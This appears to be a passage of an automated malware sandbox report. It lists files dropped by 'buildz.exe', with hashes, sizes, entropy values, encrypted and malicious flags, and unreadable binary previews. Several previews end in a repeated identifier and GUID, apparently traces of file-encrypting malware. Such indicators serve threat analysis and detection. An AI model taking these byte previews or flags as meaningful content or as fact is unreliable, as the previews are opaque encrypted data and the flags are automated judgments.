                        SSDEEP:384:8uj32stGV+LswcYLhvv/9zQTvDcLoszHC2wvHYNsJWqWmzUSCxeavmm8e5YHFOd2:8quGVv1zQjOC2wIWamzUSBdgyFOdhA
                        MD5:7395A5F0C3EAED73A678D91993F1D412
                        SHA1:E2DC0A88AF8BC5C09B28CF24996938681403E9C8
                        SHA-256:7901EB7EC245F81C2B5CA25EC8EFF96A1DB4CB7027A535FA584E42B30972E935
                        SHA-512:78A5E903E2AB294882E54486F142DFA8A615F7087BBCB7303C829D758DB9DBC384D427CE548F4BE95EB5A9E13FC6284899A424CB24C6E7C6EE219E870D0EE97A
                        Malicious:true
                        Preview:{. H..kD..).JD....(.3q..t..."..p|=.M_6.....[.U..1'+d.=.. \.$.(.*....!o..*..].......m...[,.Y.".tb.#...}.u......qX^...O...n...uZi^..._n..;7....2R.c...............p...C.I...b.'.*r.bl..~.z...j.i...M..E..q.]8.s...D.')..X:..&.....?.a...&.y...E..d].u..w....KJ..].....<q4.z@U..%pu=.....b/.|...t.S....uO.j...,....yE...'..S..\.pL....C.%............r....*:rD..wTi..A.....mO.L+'.....k...j.....'d.0"*...Y.G.b's.#P...(`w`..]p..._j..&=0..d..V.&r....+....2u.>..O..!i...O.G.<.[.....a.w....In.;..eZ1.....{.l.......W1.p..p.F...,l..CUL..OX.m..7j#G......BBi..6.*h....}.......1#=n........^...mX.6.0bs.....{m...@.A.....@..Z....G.w*.FX*o.u.9...6.zR........;..`..'V...h...B."....`....:.}.jv....*}....M.g....A.gj.{..e$.X1...5...gW).....7..e...w...F4....\. 1.m..?...q.@.t....,.l?Jw|...3..(}...Wu...19U.}e........gy(W.(.:c......st..}.1A.%V.{f...,.....~.c...(..Y."J./.y.........Stl.<...qJ(qG.:u..&.....s[q......K...kIY.t:..z....u....9_Q...y^..........b ..~...r..8H...5...*2.[YL........4H
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):148627
                        Entropy (8bit):7.998742483168145
                        Encrypted:true
                        SSDEEP:3072:XeCqA9XTNdy2CG9qjTOal7ZlIuAoz+eWdT0L53nFfhGd4m9PQk1A:u4pRZCgqPOal7ZlKhS5PmJy
                        MD5:9CB4D0F7BAED466D64F3C3B94CD53125
                        SHA1:9539A5DEA0E81C0BED81C75725AB9E29041DB1B9
                        SHA-256:181C298EF9E2ABD5936F8D33882292997E0A2C1D38E979C4272523F096F9B778
                        SHA-512:DA0D7C1A1DC182119966FB2E5FDA75C8938792B0115E04836B3DDA1BBA83919C6FBD651D08E17221DF3FD18E55044A30D697541B9C4BD007B233253A6CAD35D3
                        Malicious:true
                        Preview:{. .N..{.N%.....t....{Q7=..6.h..;....H@...^...*.*.~k*h...-..O.<..._.{B..x.J[.....(...O.........U.*..c.9.b....y95.@>.n=..E./...2o.Fi..QVO....Q3.-E...y""...mP.......5Jg.u=...l&.,3.U...|>.m..J}.8..............Yf.\.d.gV.!.....ml..e2..M^7.},`.s..}..Mg..Y.5..../..%..;.7..k.......,...42..].@......w.v.t9...M/....#.j.f....".6G...2...YL..I....=.I..>7>X..7..s=Fi.............,.M.U.v...%..eE..,........6...(. l..!.....!.Y......c.$....r.*.s..%./..W.c.i./.$.....3w.v.k......t;?.\x.L.>.&..R./...{..i-.....].A.......6.N.u .x..<.}#.......l...ii,J......}.c.)......1..".`!...U.S.kr.......8.f.........T...r;.....do......*...J.j=\,.os....L..*.....;.f....%..6....5y[.......U.o.\..oN&.9&.D...H..V...}!2pN.1.:....X.^...............sX;h.q...{..+..p....OR..4O.7.>&S.T..................3...?.'..C*..)._..fv.....X..........H..8..t.L$X!....-Di...;....r.s....mx..H.u../2Eo...<@.cdh3...]...f.F?.9.~..V E.S,....H?..%.....d..{.m.....+.V.i.C.8g.IL..B...*.Unq~.6.K=....G.y....B....:..Q.&...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):511701
                        Entropy (8bit):6.020715904751199
                        Encrypted:false
                        SSDEEP:6144:RFuEUbjxDM10RkvZKe28gWQjeuDF4w/mWH3+klkfzTOJHYUbHG+FZ8QTHNGs5AeR:z2nxaACUH6bfoGQ8+eeR
                        MD5:81A39943F1762F5189CFF5CCFAE7D7E0
                        SHA1:A3B6FFDEE1E951E1A15D9625E74F08AAFCE46D0A
                        SHA-256:3348CDAC4BFB81B67B42A807013FC917F2F8579A73FB84E79032647046203776
                        SHA-512:7FADF52119F30C78772970EC21F306D6768DB710318013C83FFD0FAB7D00A05E96C318A38E0A7DE69605B7852BA70C9D1B1FEE99E3BD1F58CDA16876C51E25DC
                        Malicious:false
                        Preview:{. ..<.u.6..i$....N.?.{c.82Y...O.7.AA/.2WW...KW...S..:..&..&.Z4H8\+.uy..'..6.k.s.4~. [3.B....B.u...!~...W,...$....`1...<.j.......ahkC...J......IP...8....., >s.....N.3Ta...`...L...$.......r...{.f...B....8.Ko......;t.'..FzH.....sr%.E....OD....Y....kF.:.T.9..3.<.Z...D.]!.sfa.42...;.}..1......o."..Br..U...:..1.R....X.I.?.Y......85r...b..-.sI...]s.!&..q.s...HzDRY..&.*Z@.U.s..F..$..."....=.,."...b.S..P..T.8....T..I-PE..RC_..j.F..........Q._..Z..-.d.Z.|.R....*.R..G..3o.rg{c]....M8.ea..c..G.....J.G...]..Ku....... .xIF.`x..=k....3#Y$R5.C..`z'...D....?z;^E..>. ]..K.$.F.....v#......Km..RY..7V.P.z.kT&..gt....4..V ......g....G..<..jw..B..\[. ?.j.....F?...j............o....u._.n...n5..c...X[K..v.q......P...s......y!.t`.ZMk.&.O)."........z....o.a(8~.\Hx..aI.^>.Y........Z..H.S7..`eg....B..........a...\.2.G./e...!..=".b...j.2.x.K.........~Y.3.:.W...B[.~...=.J.rO.....Rk..Kd.:..../`.x=K.Gj...hA.;.........X=w~..,.3p.Nh...f...(./3.b<_P.x\..c....ZX..Y....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1060
                        Entropy (8bit):7.840219068528512
                        Encrypted:false
                        SSDEEP:24:Wj4AbQLQPrjOrVXtG02naHRdBOiQz2SI3DYs5HX9qAKRiTGbD:NWCdty2dRQz+TBJXAAJTUD
                        MD5:A0BDF952CD27537DF8F6D45BDAF17546
                        SHA1:6627C97EA0C79E16C85F29A8FD9DB53D862B0127
                        SHA-256:CD450E3F51F8D3D10329ED1F8767A599D33DC64936BE0D48633F2EB575E333AF
                        SHA-512:B3EB15172514829716D51AE034B6DF2DB7BC727E1C036A122AD19BBAB339B2D0A79EDE4450562550C2708212D2380BE21584E0908EB2B92A75A7A3AACBDEF46F
                        Malicious:false
                        Preview:{. "..x..mfM.j.<....[..!uh..@MZ...hdTq.....\...C=..:.U,.........H_7t.('.H.....>#b....#.......GD..;.....:._1}"....%zd1..!@.....GI$..v...S#.q.E.".C2TO.....7.......D...}%.v.g..Y./......^..a....1.......X33.7..(?{.kp.. |. ...)..Gh8.k.y...5L.!....?.T.......D..&.+...J.cf.Z.......j.|.?/.z....a.?.ac..S.&..9..P...X....*.S4[e _..,|S.LF.hi.grY..z.pz.Ygt.a.k0.....jR............<..g..2....;..L#....F.&.].^...i.w....n........0S...6.6.A.O..k._...&.U.Q....9OX..(..`Xx?..3J;...#.b|.i....g.'_w.A..2....d .]..O...bK..1.b..k..~.k...mU5..,..!q..1....~o.y[.|.$M.._.]...Z...,..;!.)U..V.H..x..Vfp.)...."u^....na.#....*...`.:.T.&.ie.+..B.AT....c.EvA........<SF.E"..9.`.].7AA......IP.[.A....x...s.....#i....}.L....s..W..C.e. .t.?L.zNl..f..AF.q.3_\...&..Id.=r...1$H.F....@.#..z.p.v..n.."k.l$/.{..!.~.|%....6.q.....#.x..B..M....K)..:.&........u.P.W.......^'6...LLu+..+....0..........N...c....NA.#...O..x.uS.....`....NxZ.A6..=.5\..X..P.u.?...FG{d..A.8.....".'...EdRvSqD59xL4qFRlN4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2333839
                        Entropy (8bit):4.656939618046113
                        Encrypted:false
                        SSDEEP:49152:McKFYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEp:Mca
                        MD5:680ECD5BE62634B18CB8C310B6778252
                        SHA1:7FF3A6EA967C1E22EF969CFE3F4DBFBF80D74033
                        SHA-256:2CCCE19A4C614413B844F563898DE566F94C71EA28FF773246DE958016F6766C
                        SHA-512:0002E845B4A40F7F5C1B4CCBF8AB37F3E860058D1DFE3D3040D75C338B0E570BE8FB6B45E4C6385EF8E80F6C910F718F8AEEE1697EC3C19DEDAA3A3B8DED04DD
                        Malicious:false
                        Preview:{. "..A...8.....=)..&~.W7......#{".*.t.h.c./.0T..].....J....3 ad....z.CW..i....$..S...B* 2~Cx..:..7.l..5....\.jE6.v.g.....M.[..i.J.=..3O@H.r...*...N..l.i....9...&.Nh. c..D..q...vr...r]..5*)o...Zg..J1.u)gO..MJ.9...b`M..r...2.<S....V.&v.*a.18..d..q.@.......,;.L\Fo}9..ox9.M.]...[(w..u.;..(...S..F..T.T`.~Y...n..t.D.C..,.B.m{.x.CK.6u.?.Q<.M../.G{f...M...2.|#....`W...s.v.;.n....0@.....@jdub.7m/.X.^...G...L.-Aw...'...5.a..9...L.z...gM.U.)U.W.&...J.2..Wa.P.....?Uo..n.....e....K|...zP....l.,...?.{.....t....s.".@.?s<.p...[H.J.(..T....z./..V.I|...(...d..=..T...S*.W..4.....^..f...W..@A.6...!..?.Y...at^<.!~...k.QN..r.o..C.....8."b.'.w.l...X.sM.,.P....tOs.M.Y..{.9.B..%....D...@..3T+......Z>>...T....fZOm...J<~..H............,b...5..w.]..V'M..dF.O.....2].Q....E..Cb0s..#.......].E...kn>.%$b..6.?}V.T6...d|.....$..(..&/.TK..cA.....~'..w.<+u...9.D...k...g.....I`+..x.....8!KE....K....i..\F.V...\...........k.U.B.<....J;gS.W$.s;...+....I...M.&..v..N...K-BgAF....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2333839
                        Entropy (8bit):4.6557967360653905
                        Encrypted:false
                        SSDEEP:49152:sn5K5TNqWFYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEC:A5Klgh
                        MD5:B64A4D02DA14F626ED693747C613D2E6
                        SHA1:29945B7AE706A05B5D76B4588C3C6A5447F4C515
                        SHA-256:D7783EC2F330406771AE7CB69B720210251897217321E67F420F7105D5A8BDC3
                        SHA-512:0C252E14EB5A295DADD4D6556952CF645B1309012102594603C6262CD7605DE2B9FF59BE42E9A63504E952F1DE9F5112189E967547E7308A3275290C733E8A4B
                        Malicious:false
                        Preview:{. "\.:...@.bO*k..T2.......t[..b.....#z.w.t.|=....<.o..!`..*.#.ZN..nTH../..........I.:h.....>.e?:H.c.....O.."......1.ZU...?.[Rp.....>.J..zGA.F....FR..Pg..@..b.88So.r.S...I...._.5.]Y.h...gi......A4Q...L.jP..@..,t....4.'_..)8..r..w\..1N...H.......H..jd2..5Rg.Oq.p.......x..Nq...[......8.?5..}M.\.XN6.,..Xb....A.;X>/./.!...5e...bsL.q..$T.W.X.u.:&.....J..._.Syw%..............j....,d^d...S"..K...m....Tl.5&DO_V....(..MD..+..V...1...P*s.C%;.V(..*.=H.<&..;........#e.e..b/.p..C.u6.26.9Y..M[4..sD.e....l.....$..[.szM...V(K......v..V...L8T';Y.uq..(}X........~..Z...?......s..f[.....h!.o..$..c..t..<.E..D.^..N...pce..S..NL.p..U^Z[=.S.RJ...4.._.....#<....P..U..Y..........@+4cc.'_..xDk.$BI..J...?..T.l%?.kJ`....%C..^F@..;.T6..QyI..M.7..h..,...(.>.fT...$.N?.A..M..t.LR......\.j-s]a.%..q.>.'...._..0 ... h7.@..0C7@.t.n...yWm...~<P.&f"...... ya.\[.`..=/......_...&].:<..Xv..Y....qjv.`TE..(..L.j..8.I..e.tZ..."....-..x.A.&w......4.nQ........~..0.8._. ..J....K....!s6.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24582
                        Entropy (8bit):7.99260941857255
                        Encrypted:true
                        SSDEEP:384:x7wFKwI+4I6sbIh9OdhFPZhCuaZzxf4FmAhTZaKKtEDK8CRHAEzBq6RmXq43kn77:xwI+48dhFBaVGm0ZWEDMHXpm6NWd3A
                        MD5:852ABDC81A35DF0A653B2A2C25AB3E57
                        SHA1:84746C77298E57D829A6342887E1A9C581108BD8
                        SHA-256:0263264598378B7E4390F19E2310306394F3FEC7A482E7D051EFA9FBBA15DC3E
                        SHA-512:049E9ACEE099C366A1B39154907786C0B66C8DB6D216B55AA6D80FC6619A3806FC84F6B3BE06B555B3B2E23E3839BC27A010D86099295176FE9D7DD3FC3F22DA
                        Malicious:true
                        Preview:{. "+.[..)S..r.v..'./._........!.}:H<.d.0v!B..]L. )H..o9.$.....c..3S..eGH2"....[...W-......Z...[.:C2.J.u-..17.Z.:.@`..:.....y...`-.......9..n.R...x.A..M.B.....P.B..\)_,[.).A.......+....W1t...=+.....&.........AEH.......DD........uy....P$.'...%.a.5"3..|.+..c........L.h".s............b..6w...,.:i..6.ak=.].dp<..V.#..Z..F6...n..grL9\....E...C...F7&3....H..OK4L.....^..t-..M~T...RE....^Q?J%K..8b..k.......%..g...q.......m.iS.IKc.Wu#.bVZ.....+n.xo],.........\...j......Y..@I].....^p.!.u......j.k.Ea...........j.~.<&8w&.inX..<.4.a..|....8...bNiD.G....K ...^.|..rr..WE~".?p,,.`....R.D(RL...|.m..C.u..X.V....h.~..?*w...(. K....7"z..\.oLo.:..dx..f..;..<.,...!.....+l... ..o-.X......^t..b.Qd.2lui.#:B..E...G...k.&N'%.?4...G...j..0.y.c.Q..d.[.....}...@..e/d..i....4.h[<.$+\&l.9.h..m...:$.`.....W>"o.g..|:.7.+.....cl1..'[.M..M.zX3..#.o...._._p......%q.'8....oW36g..SM..r.....K...1.:..P..o..<.>u..k.@l..'.'..p.>..S=..W|.\D{.4).o.q0.......V..8.X.J..hJ1..\...#.4.a...q..W.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1666
                        Entropy (8bit):7.895593468347495
                        Encrypted:false
                        SSDEEP:48:n92xa0Z/F/pwKfYku3CQAdzrhC1cUdsWcmhR0gIflTbwLbzUD:n8xznfYku3CLlDUdT0gOTbwLbzA
                        MD5:85F01CAE1732E01A28C7DE5C763F32AC
                        SHA1:E89E409A2064072EEACBB35EA3041B8B6BCB9CA9
                        SHA-256:F9AB9E277E50C4E82C2935C718A8772C86166E012C59FA5A51261931EF41A36C
                        SHA-512:D25D43903C8FBB45DFF1E9CB8E4A40908E6FB22BD052A4FCFE2EE792907BEFD4C7B0C1EE54FAA97D3D2D0E70654C734919EB4AEBAC5B531C593C8E4E89A61B34
                        Malicious:false
                        Preview:"use ..%gU`.A.....kv...J.....5...ck.....|.4....\{...aR....m..........%...$.....D.....6./x..#..t.........R..EGa..3.....0.I)..l.:Z..BL.n.@..+.M.U.'6.dQ.S?..xk.P+w..YV.M.7_.E..).U..V..UP39.}J......U....Z....Y._.K...$|.;.6.*.....G}.am../..t.xIt....B...,....odFd...."........n.Y...dg.1...vc.._+!G..%.Ri.B.:...#H.u{6}./..n...>.R.........R..2.,).=b.9..Gf.}..D.8.!.k.S.$.+"!.Z/..v....j.^gki...&....L...x...9X..<./:(t=.c.)4 I...9..tt.........v.xZ#$....\H.._.%.T,'.c.7....J..#Y....|*.....y..;L.....[.........C^..{t.}k./..)...._\{1...*{K...`.Q'L....1@.DU.B{.g,.T.Y}.*...8.'.=.i.P^..y.W.i.%..?.v..E...qB...1..~...9k......G.J.Z..5j.....<...7.a.!.....e...#<Yl..d..(y.OQ1s.*......D8..}._....M..i3PL..S......].v@.E.Iz.{4].@.Z.j..*.J.y._f.w........ph..4nz.b.HT~...T....|KB..F......kX.&vg.s..._.;....Y...3:.Y~...:6.Y.n.v...4Pt...."..2..E....F).X...M.Hm.#r..#..$.....#*..m wFN.U.Mat..l.u..n...d...yL....'...j.V>d.....I..l<.||...$..\\-.f...H..I..1e..].+...BU}.S
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.3396821287148715
                        Encrypted:false
                        SSDEEP:6:SCVUWGmLMbW7cS/wB5IuPYwOsGDMPnxxB7PG47QncVbz2gnMr8FGcii96Z:vVXlj7HYvIhPD+xPLG0lzn26Gcii9a
                        MD5:87B2AF8C1289938A8D56D3418753EFA8
                        SHA1:195878CCD247B167F0F5BD0286B7FFC8D0F6317B
                        SHA-256:D8A9AC74F1E166503E45181DC95BE5C0EF984352B35B6C20D84D5D4D5E8E3CAE
                        SHA-512:941860F17AFE165076467EE2A2EAE28E7CAEAF1F03E5262F12CCFC5E3BCDBBA59DFC418576BB519465D0FB7342E5FDB7D3A69FA3A4AA4EF9B66EB9B2AE1C86FB
                        Malicious:false
                        Preview:1.D38j..P....#.ADd..^.5kc.P..c.=....=Cu..].A+.@<2...a..f.d.D..u.L^?..~O....r.).!......Y.^ R6^.^....H/..~,<9\..n.f..w.-..`.9.$W...mU..a...1..... .[.T.Bv8..}..H.....M..>.>.&.<n&...e..P@o#.n.....Rw...@.-(..6R...B...OlXb...L+yx*..(....2...h......,*z....X.....<....>TX6.c.*..=.3...a...{d.y...<..;...W..t..p..n..".S.vEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):456
                        Entropy (8bit):7.459046342457978
                        Encrypted:false
                        SSDEEP:12:MGK+3Uv5sJTU7i7AHvGB5fqMRRV2F26Gcii9a:Mh+3Uvw47i78Equj2RGbD
                        MD5:D9C2DCBC5601D32086F35298D1C81DB6
                        SHA1:FC00372A2722E69AF40520AEF906C793B46C21AA
                        SHA-256:8A71974749F4BD4B50860BC2BA0476EF28D98E3F1F9DE29E253D1394BC66E209
                        SHA-512:D2552C2BEC33EE120486E2CA297DCC4FA15421272EAD9EC7FB96F059EFA0EF12B141FEAA01943245E46619D78109AC8053AFBF9CE18A068E0211D57AE8DA160F
                        Malicious:false
                        Preview:.{.I.+o.X.J..#.bC....g........D2...O? >.......................R).r.w7...V....[..^9WG,P.7.J!...>....@{...=W.......ce.../..rh..%.D.)..Rk..&....K.B..H.r..s$.{...$.c....D....S...k.....\.....x .=.R_....WES....>.W..Vb....Q....Z....k.b....*DJ......d.>Oo.r.......0r...W*d.J...n...).L;..e......'>1.>'...6+\.lU...5t.t.=.....C.{.C.k.\db].O.....x..K.f........&...*$[f@eeEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):653
                        Entropy (8bit):7.67340882723507
                        Encrypted:false
                        SSDEEP:12:wEt+cEARj0oHFYgAeX8sCsmXypaO6qOrWs6vrnquM26YHxHbrv+xdcEGA5QZB/2b:wEIcf3HFn5KypaO6q6Ws6vzzMTYRHfm5
                        MD5:AAF3E4FF3F84DFE99E7EF485415DB37C
                        SHA1:037A1DA660AC58B6BBC47E87BCE73980CD5ACE44
                        SHA-256:F090C6275688977DEAB127E6F7FF78D7B80D4B6934A2B6DD3174873900434B6F
                        SHA-512:1E3DD4956DFC4BAB1F3F8088ACACB05AE423277D2139703018AB16CC8B01AF3EA9D742FDBB70CFCC32D707D4AF701B0B1CCBA24E3346E9AD1A796755EEEFDD04
                        Malicious:false
                        Preview:.{.....[...n.S jf..8.,.|..X.i.[.....qZ..[..=.2....v.....'.0.2.TQ.)..f..........A=.8....=.o+w..83...}......E.@.N..=n....r......\....wb...{.|B......=.W.A~.....,...oG..2....P.u..C.Y~.......M..&.'D.8.<gc@....}.[H.o.....6..@..V\Mt4.v..~..A.5....l>rV....[r.!Nt..V..{'..;z...-. ......-..u>2'. .-.gi|....Y.(E..."_.ZM...4D..c.C.......6b.yW&e.Q.........i&... jD...?~p.:.z.PE..t.......K..|....T..#P...r....X;.@1.$...[5?..w.@.*....j.i3..l..o.....!7....$..,dz...eEoJ...j..1M.]W..~....\+.sOy.%...4..U.q..J...._0..R.?&?xXN"X..lif....^.M....%J9...........B./.u.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1441267
                        Entropy (8bit):6.074888293528731
                        Encrypted:false
                        SSDEEP:24576:4TXneYjuxvUMriDrhm0YOR/jnKZ2FWsfI0fYFQhMjh5AkJSe3J3kJTEjucy2fQHZ:4TXneYjux8MrYpYOR/jnKZ2FWsfI0fYa
                        MD5:5022228FC6641693788D4BA7CD962B1E
                        SHA1:6DDCAB83A875D9A31B2B9BB125356D37D90D35A9
                        SHA-256:A8B79035B8702739DD9DB8022112D49EBF75EA6972B8824B070820ADACE78948
                        SHA-512:4EDF560448D83B87B94F2D5D3311FC37B03776D752AD1B41F3AC8FE9C801BF160BC88E7B98EE19160DFC6E97B40C31249BDE613944854DCF25A7E126CEBA2BAB
                        Malicious:false
                        Preview:/*! Fy+^.KZz.L..z....t.d..C......-....8.6.B.*..!....4...*..{u..........[R=$..3.(d....dj...."...*.H$..... @....K..I....NQ..............|.v.}`..l.U..^..W.....u.0.....GukGL....9.u.+.J....GJQ*. ..2..q...}..o....^1...&z.h.uCz`.A{9.......K.O{..<..>?i.p.......j...5)..+.&.,.o..t..+.~?....ks..g...z<...J..b!...$..J.........G..s..&...B(.BZl.....{.-D...Vl2.K...q.M.S...I\2..Oh^N.'.!..A?........L~..@.8..l!.5...w..y.b.d..9..,..;'.......AcZ......}6|..f..?k.v/s..)cHW..CD..N...U..E..........P.x.,.5.I 2..b..t...f..X...fp.9..u. :..s.r....?8..#.-..].d.<...T.F..2.Vx8...K..C.....&...Q..?..&..R<$8.i..$%..M5.[.]....3.....d.l^....E...,.j.hz..t..P..m.[ .m_E..._.......hH....a..:....q....E.&..T!.Wf..0.'........R|..n.g.x.J.!~...O.z-\...K..nC.l.tu.q..M.. .;.r...........b..*..#..a.<..La...c..t.x.v...J.O.|....RI.....^.{.>E....:O..B.)...?...F=Q..-"CA.....0q.T.Q..-.....y...K.}...8(.;.p".&V..oh.Z.4....y.US9.>/.....>=..D~.,.._$.!.ek.s..W?e..>.....#.y.^'..N?.|.....g.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2052
                        Entropy (8bit):7.890161344286499
                        Encrypted:false
                        SSDEEP:48:+4Nz2S5qIxQaYZTT7rT3DpjT4F/2SIg5L54KiMoDUD:+uz2S0gQaYZfL6FHxSKiMmA
                        MD5:D4582C48FEE346F08D97ECB2BD32097A
                        SHA1:A09F98145EB56F004972151CF0DB14588C9BB3D9
                        SHA-256:95020459F4FC96DEF373EFCF83C7A1735BCB45BE7D5C71CA17840E8806981C7C
                        SHA-512:B17E8F4A6846B2C5EA56BF78B23ABE3113CCE652D0FEFF9C6E84A4737D64B4B3542EB93B7A68DC2A034C2CA0028603EF92036D04F12008BDECBA0DD154A393E8
                        Malicious:false
                        Preview:<?xmlU......F0...{7I..X.G...Y...........O.d.9=..........2.......D.7Q..m.x.....q...ae...6 ...i$.1.v....R..D.HJ.A>.8..RXck.f...I.!.QZ.......fE.D.lF..R..:....v...A..W..v..0j.=...<..1...!....l.Q<....v.\.>.*.b*.p.:..5.i:3..C..2_nI.w.K.4.H..-54.).h..A....!.f.+.Wh.#.Y6.]....;j..O.Vf~.. .C.f..~T..6..3.C..Y...nu.B.XL.q)O.qBL....v.....$/.[...Q..|./.9<.Q..`.YB.25..`....!....`.Ld.8.*#..$...U._..3p..,.K...f.#....."J+...{M..m.T..8.n....y..@H..K7...:.BLT.........*./...<...e.b...c........^.:.eu.........g.!.%.G.b....J......-...\...Xk..b^..@......G...x|#..Hl....Fg.(......p`.{.<...........6zY..O..#b.....Mi..z..."..._....,&..T...d.Z.W.5....W..........T. .!R.R].AR=#V2."..).i...Yr8....fE..{..;F.0C,.Z2.....xo>.F<...?.b..*......uNd....A.....9...j.U...L..-.v./.n..+-'....Y...;....v&....`5...k...>.N.....#.X..F...k.$.T.}n..%.i.P...,..zzI.....v+.....$^8.......0..O..[.y.b..[.{ax&7.:..Y.....;<.6..5.....5I.X.I.N.Ds........,..t.a6\..../..8'.g.T...)..o..5.x..%g.1.)..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2937106
                        Entropy (8bit):6.391466621401778
                        Encrypted:false
                        SSDEEP:49152:3ZKZ/Qz5ufAD5J9OOzqrtP27f5FamW+kUbwqL/mQZ2S4Xwt8zH1LLp5XlFLKxF:3sGF
                        MD5:7234EBCCEEFE5EB9874D0289B46C93BB
                        SHA1:5F8DF1803EC0260348226F98A6391C33BE4FC150
                        SHA-256:510DB0155740A219A1E81649B9877FFC7FC858BD12D804C869059BD621F642E4
                        SHA-512:7FBB96BD17470C9415050713C08F00C66E9DA8468AAC7F074085427159A7D75A8453D912E52A3DA29B28617EEF9657C2EA729B69055511F730A4345F455A45EF
                        Malicious:false
                        Preview:"use ..!.....4.......!..Q;..L..M..._......F....?{.3........w..2U&O...(@Y.j....Q..<.K!m."+ix..9c.^~....S..........K`.D.....\..W.....jln.;.P;.$~3:...`..e...>....F......I....mS..`P....B..*..ao.J...x......XCi..5.c..y7.T.>....j.4.y{.T.3Nw.r*..Y.R..1.C ...Hd..6...Hl....W.,...;..r...,.y...2.......L.j...O..E.2;...#v}F.u......X.s..6..........6....A.`[.7.d.p...l.....(K...\r....,L.$....4.r....3.9..10....r..K{c..R{..O,@k.bu..p./...^.....^4N.9uh....T. ..>....9".....4v..P..rm...o.!W.].h.$(t......A.&<X.......K.KOT...a.,..@.....]AEh..J)cv..................t]!..`K.4cpz.S..Q..y..8..C..vx.....U.5.W...&...*..q...x.g.....C..(..s....l).G..WZ.t^.'?....i...33.S...b..p..4Wu%?..a..9..{t...o..h&.1.i..*..)S...3.V..MB'.A2 x[.Es.T..p.WW.s>J@..3q.S.T..]$Kl.!X.U..4..S"m.bi+/..;m.....Bno..jH.....l.........T.B.5?...w/.f.f`..IQ..2Ec..7l..&....Dy.#/.. ..z^..-$..!......;V....v.+`.\q...V..{....s.........h3..+....g...eB...._...GxV'5.U.R}...CzW.4.+.>.M.g..........t
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2295
                        Entropy (8bit):7.9042027653427205
                        Encrypted:false
                        SSDEEP:48:c1++TaCyNLYfIoKLXeH7v1bsDhZ9k55V9xThmC8LthLUD:AOCcrLgbcs8CmA
                        MD5:6ADA5234AC1CF81B4BA14874FF074274
                        SHA1:8F19EA764F345AB0D41F8836EEDF7011F7F11E6A
                        SHA-256:71E78B99DCADB7A8F2CF5A6BA15B745647918A82BBE473FE37722EF55FE500A4
                        SHA-512:2F29DF3D1E779FC7C34D6A9D5C3C40430916F0806009C1FA499ED1E9E2E536970DFE3509D95F77322526ECAFBCA70E8DCC7D217E68C1191371CC8EA94ED97CD0
                        Malicious:false
                        Preview:<!doc.3.3l.f#..>N.-_../R.5.....y...[-.. ........,'.+E.<....l]...dF)..}.i....g.i..:I.9^.....y..$...-......e.%(..W.p.p...!.Ix.......KE..:.2.k....5.g..V1F.g.U)....p..Q..nTv. .9a.N..".>.2.-..GE.."..?(.B..D.l....].......R.Y..TS.9i.f....\c~[..%....7....]N._..\......).[.@".v7p..f..... m.......O%z.|H..v..-.5...I>.u.fP......v....1.U..5G3,..pz.|!...T(..[mJi..x...uox.Q....k.x..zz.Q.............j.....r..k^..e.:.......-tV.A.Z..~...j=..p..&.fFR]..F(..............;6.......\n[F...J...........75.,g...f....:SV.H^./.m.9.>.Q{...)..(3......................S<...i...}9...3.v....A...+e.U...^.ITF^.z..@).g......... .om.G0?...n..h..J.....v.:.H(..a....)....#....Y9U..k..K......Q.L`fZn..6s...1...Xu..5..K.Q.P.vQ..i..].*%.W=.6..BP-v...w9+.z......?G.SzDfP.....iZT....'.r........0.u9.NVg.6....f.\..".e..4.......ev+O...."7...S..gU_...E&...[o.m@.)A..&.+....t..{.....Dt.<.....vD.n3j.......@....{...;..E...c....|...@..5r.d..gf.XNG..id..2.0!m..*..3m.p.3jCj\`/6..^.C>.O
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1199
                        Entropy (8bit):7.844744403968773
                        Encrypted:false
                        SSDEEP:24:sys7FMAwzomsIFlLlG0o5dTN4qYR0uFDkzo8Ml8ojAsbKrbGbD:mVW/VXGNV4jRdFD6onSsbKfUD
                        MD5:28D79D1713996E85FE45670EFB92B30F
                        SHA1:2DDBE478FEA4730F8CC1B7AA9B7D53C72ACD4192
                        SHA-256:C6A51C2FBF058163C3787C5C6AB5052CED907900ED25DB70B798CE3407BA8EF3
                        SHA-512:F5C671042F8EBAA3366A9CC132D9A0364DA07E8E1B0F263F082EBA29315E76C3B49FD25B7AC21340D3BCD8DE63006C7870AE4BBDF62695A38DD6AD5C7ED4DD6E
                        Malicious:false
